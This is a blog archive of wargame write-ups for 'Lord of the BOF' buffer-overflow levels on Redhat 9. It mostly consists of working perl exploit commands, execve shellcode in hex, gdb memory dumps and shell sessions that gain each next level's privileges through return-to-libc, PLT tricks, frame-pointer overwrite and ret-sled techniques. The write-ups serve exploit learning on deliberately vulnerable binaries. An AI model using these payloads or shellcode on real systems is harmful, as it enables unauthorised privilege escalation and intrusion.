18 posts in 'Wargame/LOB (Redhat9)'

  1. 2014.02.20 xavius -> death_knight
  2. 2014.02.20 nightmare -> xavius
  3. 2014.02.20 succubus -> nightmare
  4. 2014.02.20 zombie_assassin -> succubus
  5. 2014.02.20 assassin -> zombie_assassin
  6. 2014.02.20 giant -> assassin
  7. 2014.02.20 bugbear -> giant
  8. 2014.02.20 darkknight -> bugbear
  9. 2014.02.20 golem -> darkknight
  10. 2014.02.20 skeleton -> golem

1. 2014.02.20 xavius -> death_knight

This one is a remote BOF. I put bind shellcode in the payload and brute-forced the return address: each attempt sends the payload with the next candidate address and checks whether the bind port answers.


Attached script: LOB20_remotebof_sc_bruteforce.py


Other posts in the 'Wargame > LOB (Redhat9)' category

nightmare -> xavius  (0) 2014.02.20
succubus -> nightmare  (0) 2014.02.20
zombie_assassin -> succubus  (0) 2014.02.20
assassin -> zombie_assassin  (0) 2014.02.20
giant -> assassin  (0) 2014.02.20
Posted by windowhan


2. 2014.02.20 nightmare -> xavius
I used the buffer that fgets() reads stdin into. The shellcode is piped in on stdin, so it ends up in that buffer at a fixed address (0x40015004 here), and the overwritten return address points at it. The shellcode itself is 16 NOPs followed by a jmp/call pair: the jmp skips forward to a `call` that jumps back and pushes the address of the trailing "/bin/sh;pass;" string, then `mov eax, 0x40058ae0; call eax` calls system() on it.

[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x16,"\xeb\x08\xb8\xe0\x8a\x05\x40\xff\xd0\xf4\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x3b\x70\x61\x73\x73\x3b","\x04\x50\x01\x40"';cat)|./xavius
id
???????????????멘?@奇拗/bin/sh;pass;P@id

Xshellid
/bin/sh: Xshellid: command not found
id
uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)
pass^H^H^H^H^H^Hmy-pass
/bin/shmy-pass: command not found
my-pass
euid = 519
throw me away


3. 2014.02.20 succubus -> nightmare
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "aaaa"x3,"\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","\x10\x84\x04\x08"x6,"aaaa","\xa0\xfa\xff\xbf","\x7c\xfa\xff\xbf"'`
aaaaaaaaaaaa?@bbbb廈@??????aaaa????
bash$ my-pass
euid = 518
beg for me
bash$


.plt = Procedure Linkage Table
A table of small stubs, one per external function the program calls (strcpy, printf, ...), generated at link time. Each stub sits at a fixed address inside the executable and jumps through a fixed slot in the GOT.

The executable does not carry libc's machine code: which libc gets mapped, and where, is only known at run time, and the calling and linking details differ between libc versions. So every call goes through the PLT stub, and the dynamic linker fills that stub's GOT slot with the real address of the function when it is first called. For an exploit this is exactly what makes the PLT useful: strcpy@plt is a constant address in the non-relocated binary, so it can be used as a return target without knowing where libc is loaded. It is also what `(char *)&strcpy` evaluates to in a non-PIC executable, which is why the check below compares argv[1]+44 against the PLT stub address 0x08048410.

The challenge source:

/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }
        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
}


The "PLT" in the header is a hint to go study the PLT; the real obstacle is the memset at buffer+48, which clobbers the 4 bytes right after the return address with "AAAA" after the overflow has already happened.

Since offset 44 has to hold the address of strcpy (0x08048410, the PLT stub), main() returns into strcpy@plt with esp at buffer+48. strcpy therefore sees "AAAA" as its own return address, [buffer+52] as dst and [buffer+56] as src. The trick is to let that very strcpy call repair the frame: dst = 0xbffffaa0 is the clobbered slot at buffer+48, and src = 0xbffffa7c points at the [system]["bbbb"][&"/bin/sh"] triple that the payload placed at buffer+12. Once the copy is done, strcpy returns into system() with "/bin/sh" as its argument, which gives the shell above.


4. 2014.02.20 zombie_assassin -> succubus
The payload chains succubus's five stage functions back to back, each one's return address being the entry of the next (0x080487ec, 0x080487bc, 0x0804878c, 0x0804875c, 0x08048724, which print DO, GYE, GUL, YUT and MO in that order); the last one gets a dummy return address ("bbbb") and the pointer 0xbffffa58 to the "/bin/sh" string appended at the end of the payload as its argument:

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "a"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","bbbb","\x58\xfa\xff\xbf","/bin/sh"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?bbbbX??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$ 


5. 2014.02.20 assassin -> zombie_assassin

Frame-pointer overwrite: the saved-ebp slot gets 0xbffffbf3, the address of the argv[1] string itself on the stack, and the return address gets 0x080484df, a leave;ret gadget. The second leave;ret then runs with ebp pointing into argv[1], where [system]["bbbb"][&"/bin/sh"] sits right after the first 4 bytes.

                                            _______________________
  _______________________-------------------                       `\
/:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
|        The Lord of the BOF : The Fellowship of the BOF, 2010    |
|                                                                  |
|                                                                  |
  |       [enter to the dungeon]                                    |
  |       gate : gate                                                |
  |                                                                  |
  |       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
  |                                              ____________________|_
  |  ___________________-------------------------                      `\
  |/`--_                                                                 |
  ||[ ]||                                            ___________________/
   \===/___________________--------------------------


login: assassin
Password:
Last login: Fri Sep  6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2                         
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core  fs  fs.c  zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00:     "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51:     ""
0xbffffb52:     ""
0xbffffb53:     ""
0xbffffb54:     "\003"
0xbffffb56:     ""
0xbffffb57:     ""
0xbffffb58:     "4\200\004\b\004"
0xbffffb5e:     ""
0xbffffb5f:     ""
0xbffffb60:     " "
0xbffffb62:     ""
0xbffffb63:     ""
0xbffffb64:     "\005"
0xbffffb66:     ""
0xbffffb67:     ""
0xbffffb68:     "\006"
0xbffffb6a:     ""
0xbffffb6b:     ""
0xbffffb6c:     "\006"
0xbffffb6e:     ""
0xbffffb6f:     ""
0xbffffb70:     ""
0xbffffb71:     "\020"
0xbffffb73:     ""
0xbffffb74:     "\a"
0xbffffb76:     ""
0xbffffb77:     ""
0xbffffb78:     ""
0xbffffb79:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a:     ""
0xbffffb7b:     "@\b"
0xbffffb7e:     ""
0xbffffb7f:     ""
0xbffffb80:     ""
0xbffffb81:     ""
0xbffffb82:     ""
0xbffffb83:     ""
0xbffffb84:     "\t"
0xbffffb86:     ""
0xbffffb87:     ""
0xbffffb88:     "\220\203\004\b\013"
0xbffffb8e:     ""
0xbffffb8f:     ""
0xbffffb90:     "\003\002"
0xbffffb93:     ""
0xbffffb94:     "\f"
0xbffffb96:     ""
0xbffffb97:     ""
0xbffffb98:     "\003\002"
0xbffffb9b:     ""
0xbffffb9c:     "\r"
0xbffffb9e:     ""
0xbffffb9f:     ""
0xbffffba0:     "\003\002"
0xbffffba3:     ""
0xbffffba4:     "\016"
0xbffffba6:     ""
0xbffffba7:     ""
0xbffffba8:     "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab:     ""
0xbffffbac:     "\020"
0xbffffbae:     ""
0xbffffbaf:     ""
0xbffffbb0:     "魂\017\017"
0xbffffbb6:     ""
0xbffffbb7:     ""
0xbffffbb8:     "珹?
0xbffffbbd:     ""
0xbffffbbe:     ""
0xbffffbbf:     ""
0xbffffbc0:     ""
0xbffffbc1:     ""
0xbffffbc2:     ""
0xbffffbc3:     ""
0xbffffbc4:     ""
0xbffffbc5:     ""
0xbffffbc6:     ""
0xbffffbc7:     ""
0xbffffbc8:     ""
0xbffffbc9:     ""
0xbffffbca:     ""
0xbffffbcb:     ""
0xbffffbcc:     ""
0xbffffbcd:     ""
0xbffffbce:     ""
0xbffffbcf:     ""
0xbffffbd0:     ""
0xbffffbd1:     ""
0xbffffbd2:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3:     ""
0xbffffbd4:     ""
0xbffffbd5:     ""
0xbffffbd6:     ""
0xbffffbd7:     ""
0xbffffbd8:     ""
0xbffffbd9:     ""
0xbffffbda:     ""
0xbffffbdb:     ""
0xbffffbdc:     ""
0xbffffbdd:     ""
0xbffffbde:     ""
0xbffffbdf:     ""
0xbffffbe0:     "i686"
0xbffffbe5:     "./zombie_assassin"
0xbffffbf7:     "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24:     "PWD=/home/assassin/tmp"
0xbffffc3b:     "REMOTEHOST=192.168.232.1"
0xbffffc54:     "HOSTNAME=localhost.localdomain"
0xbffffc73:     "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95:     "USER=assassin"
0xbffffca3:     "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b:     ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33:     "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66:     "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85:     "MAIL=/var/spool/mail/assassin"
0xbffffea3:     "INPUTRC=/etc/inputrc"
0xbffffeb8:     "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---
0xbffffed8:     "LANG=en_US"
0xbffffee3:     "DISPLAY=192.168.232.1:0.0"
0xbffffefd:     "LOGNAME=assassin"
0xbfffff0e:     "SHLVL=2"
0xbfffff16:     "USERNAME="
0xbfffff20:     "SHELL=/bin/bash"
0xbfffff30:     "HOSTTYPE=i386"
0xbfffff3e:     "HISTSIZE=1000"
0xbfffff4c:     "OSTYPE=linux-gnu"
0xbfffff5d:     "TERM=xterm"
0xbfffff68:     "HOME=/home/assassin"
0xbfffff7c:     "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0:     "_=./zombie_assassin"
0xbfffffd4:     "OLDPWD=/home/assassin"
0xbfffffea:     "./zombie_assassin"
0xbffffffc:     ""
0xbffffffd:     ""
0xbffffffe:     ""
0xbfffffff:     ""
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7:     0x6e697373     0x6e69622f     0x2e3d5f00     0x6d6f7a2f
0xbfffffc7:     0x5f656962     0x61737361     0x6e697373     0x444c4f00
0xbfffffd7:     0x3d445750     0x6d6f682f     0x73612f65     0x73736173
0xbfffffe7:     0x2e006e69     0x6d6f7a2f     0x5f656962     0x61737361
0xbffffff7:     0x6e697373     0x00000000     Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7:     0x61616161     0x40058ae0     0x62626262     0x400fbff9
0xbffffc07:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc17:     0x62626262     0x62626262     0xbffffbf3     0x44575000
0xbffffc27:     0x6f682f3d     0x612f656d     0x73617373     0x2f6e6973
0xbffffc37:     0x00706d74     0x4f4d4552     0x4f484554     0x313d5453
0xbffffc47:     0x312e3239     0x322e3836     0x312e3233     0x534f4800
0xbffffc57:     0x4d414e54     0x6f6c3d45     0x686c6163     0x2e74736f
0xbffffc67:     0x61636f6c     0x6d6f646c     0x006e6961     0x5353454c
0xbffffc77:     0x4e45504f     0x752f7c3d     0x622f7273     0x6c2f6e69
0xbffffc87:     0x70737365     0x2e657069     0x25206873     0x53550073
0xbffffc97:     0x613d5245     0x73617373     0x006e6973     0x435f534c
0xbffffca7:     0x524f4c4f     0x6f6e3d53     0x3a30303d     0x303d6966
0xbffffcb7:     0x69643a30     0x3b31303d     0x6c3a3433     0x31303d6e
0xbffffcc7:     0x3a36333b     0x343d6970     0x33333b30     0x3d6f733a
0xbffffcd7:     0x333b3130     0x64623a35     0x3b30343d     0x303b3333
0xbffffce7:     0x64633a31     0x3b30343d     0x303b3333     0x726f3a31
0xbffffcf7:     0x3b31303d     0x333b3530     0x31343b37     0x3d696d3a
0xbffffd07:     0x303b3130     0x37333b35     0x3a31343b     0x303d7865
0xbffffd17:     0x32333b31     0x632e2a3a     0x303d646d     0x32333b31
0xbffffd27:     0x652e2a3a     0x303d6578     0x32333b31     0x632e2a3a
0xbffffd37:     0x303d6d6f     0x32333b31     0x622e2a3a     0x303d6d74
0xbffffd47:     0x32333b31     0x622e2a3a     0x303d7461     0x32333b31
0xbffffd57:     0x732e2a3a     0x31303d68     0x3a32333b     0x73632e2a
0xbffffd67:     0x31303d68     0x3a32333b     0x61742e2a     0x31303d72
0xbffffd77:     0x3a31333b     0x67742e2a     0x31303d7a     0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) q    
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit 
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq   
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `                  aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3:     0x61616161     0x61616161     0x62626262     0x400fbff9
0xbffffc03:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc13:     0x62626262     0x62626262     0xbffffbf3     0x080484df
0xbffffc23:     0x44575000     0x6f682f3d     0x612f656d     0x73617373
0xbffffc33:     0x2f6e6973     0x00706d74     0x4f4d4552     0x4f484554
0xbffffc43:     0x313d5453     0x312e3239     0x322e3836     0x312e3233
0xbffffc53:     0x534f4800     0x4d414e54     0x6f6c3d45     0x686c6163
0xbffffc63:     0x2e74736f     0x61636f6c     0x6d6f646c     0x006e6961
0xbffffc73:     0x5353454c     0x4e45504f     0x752f7c3d     0x622f7273
0xbffffc83:     0x6c2f6e69     0x70737365     0x2e657069     0x25206873
0xbffffc93:     0x53550073     0x613d5245     0x73617373     0x006e6973
0xbffffca3:     0x435f534c     0x524f4c4f     0x6f6e3d53     0x3a30303d
0xbffffcb3:     0x303d6966     0x69643a30     0x3b31303d     0x6c3a3433
0xbffffcc3:     0x31303d6e     0x3a36333b     0x343d6970     0x33333b30
0xbffffcd3:     0x3d6f733a     0x333b3130     0x64623a35     0x3b30343d
0xbffffce3:     0x303b3333     0x64633a31     0x3b30343d     0x303b3333
0xbffffcf3:     0x726f3a31     0x3b31303d     0x333b3530     0x31343b37
0xbffffd03:     0x3d696d3a     0x303b3130     0x37333b35     0x3a31343b
0xbffffd13:     0x303d7865     0x32333b31     0x632e2a3a     0x303d646d
0xbffffd23:     0x32333b31     0x652e2a3a     0x303d6578     0x32333b31
0xbffffd33:     0x632e2a3a     0x303d6d6f     0x32333b31     0x622e2a3a
0xbffffd43:     0x303d6d74     0x32333b31     0x622e2a3a     0x303d7461
0xbffffd53:     0x32333b31     0x732e2a3a     0x31303d68     0x3a32333b
0xbffffd63:     0x73632e2a     0x31303d68     0x3a32333b     0x61742e2a
0xbffffd73:     0x31303d72     0x3a31333b     0x67742e2a     0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3:     0x61616161
(gdb)
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb)
0xbffffc03:     0x62626262
(gdb) q  
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id   
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$


6. 2014.02.20 giant -> assassin

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

I don't remember exactly, but I think I solved this one with a ret sled.

Program received signal SIGSEGV, Segmentation fault.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`


Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
0xbffffd00:     0x69616d6f      0x4f4c006e      0x4d414e47      0x69673d45
0xbffffd10:     0x00746e61      0x4f4d4552      0x4f484554      0x313d5453
0xbffffd20:     0x312e3239      0x322e3836      0x312e3232      0x49414d00
0xbffffd30:     0x762f3d4c      0x732f7261      0x6c6f6f70      0x69616d2f
0xbffffd40:     0x69672f6c      0x00746e61      0x4d524554      0x6574783d
0xbffffd50:     0x48006d72      0x5454534f      0x3d455059      0x36383369
0xbffffd60:     0x54415000      0x752f3d48      0x6c2f7273      0x6c61636f
0xbffffd70:     0x6e69622f      0x69622f3a      0x752f3a6e      0x622f7273
0xbffffd80:     0x2f3a6e69      0x2f727375      0x52313158      0x69622f36
0xbffffd90:     0x682f3a6e      0x2f656d6f      0x6e616967      0x69622f74
0xbffffda0:     0x4f48006e      0x2f3d454d      0x656d6f68      0x6169672f
0xbffffdb0:     0x4900746e      0x5455504e      0x2f3d4352      0x2f637465
0xbffffdc0:     0x75706e69      0x00637274      0x4c454853      0x622f3d4c
0xbffffdd0:     0x622f6e69      0x00687361      0x52455355      0x6169673d
0xbffffde0:     0x4200746e      0x5f485341      0x3d564e45      0x6d6f682f
0xbffffdf0:     0x69672f65      0x2f746e61      0x7361622e      0x00637268
0xbffffe00:     0x474e414c      0x5f6e653d      0x4f005355      0x50595453
0xbffffe10:     0x694c3d45      0x0078756e      0x564c4853      0x00313d4c
0xbffffe20:     0x435f534c      0x524f4c4f      0x6f6e3d53      0x3a30303d
0xbffffe30:     0x303d6966      0x69643a30      0x3b31303d      0x6c3a3433
0xbffffe40:     0x31303d6e      0x3a36333b      0x343d6970      0x33333b30
0xbffffe50:     0x3d6f733a      0x333b3130      0x64623a35      0x3b30343d
0xbffffe60:     0x303b3333      0x64633a31      0x3b30343d      0x303b3333
0xbffffe70:     0x726f3a31      0x3b31303d      0x333b3530      0x31343b37
0xbffffe80:     0x3d696d3a      0x303b3130      0x37333b35      0x3a31343b
(gdb) x/100x 0xbffffd00-100
0xbffffc9c:     0x8969622f      0xb0c189e3      0x5351520b      0x80cde189
0xbffffcac:     0x53454c00      0x45504f53      0x2f7c3d4e      0x2f727375
0xbffffcbc:     0x2f6e6962      0x7373656c      0x65706970      0x2068732e
0xbffffccc:     0x55007325      0x4e524553      0x3d454d41      0x53494800
0xbffffcdc:     0x5a495354      0x30313d45      0x48003030      0x4e54534f
0xbffffcec:     0x3d454d41      0x61636f6c      0x736f686c      0x6f6c2e74
0xbffffcfc:     0x646c6163      0x69616d6f      0x4f4c006e      0x4d414e47
0xbffffd0c:     0x69673d45      0x00746e61      0x4f4d4552      0x4f484554
0xbffffd1c:     0x313d5453      0x312e3239      0x322e3836      0x312e3232
0xbffffd2c:     0x49414d00      0x762f3d4c      0x732f7261      0x6c6f6f70
0xbffffd3c:     0x69616d2f      0x69672f6c      0x00746e61      0x4d524554
0xbffffd4c:     0x6574783d      0x48006d72      0x5454534f      0x3d455059
0xbffffd5c:     0x36383369      0x54415000      0x752f3d48      0x6c2f7273
0xbffffd6c:     0x6c61636f      0x6e69622f      0x69622f3a      0x752f3a6e
0xbffffd7c:     0x622f7273      0x2f3a6e69      0x2f727375      0x52313158
0xbffffd8c:     0x69622f36      0x682f3a6e      0x2f656d6f      0x6e616967
0xbffffd9c:     0x69622f74      0x4f48006e      0x2f3d454d      0x656d6f68
0xbffffdac:     0x6169672f      0x4900746e      0x5455504e      0x2f3d4352
0xbffffdbc:     0x2f637465      0x75706e69      0x00637274      0x4c454853
0xbffffdcc:     0x622f3d4c      0x622f6e69      0x00687361      0x52455355
0xbffffddc:     0x6169673d      0x4200746e      0x5f485341      0x3d564e45
0xbffffdec:     0x6d6f682f      0x69672f65      0x2f746e61      0x7361622e
0xbffffdfc:     0x00637268      0x474e414c      0x5f6e653d      0x4f005355
0xbffffe0c:     0x50595453      0x694c3d45      0x0078756e      0x564c4853
0xbffffe1c:     0x00313d4c      0x435f534c      0x524f4c4f      0x6f6e3d53
(gdb) x/100x 0xbffffd00-300
0xbffffbd4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc44:     0x90909090      0x90909090      0x90909090      0x90909090
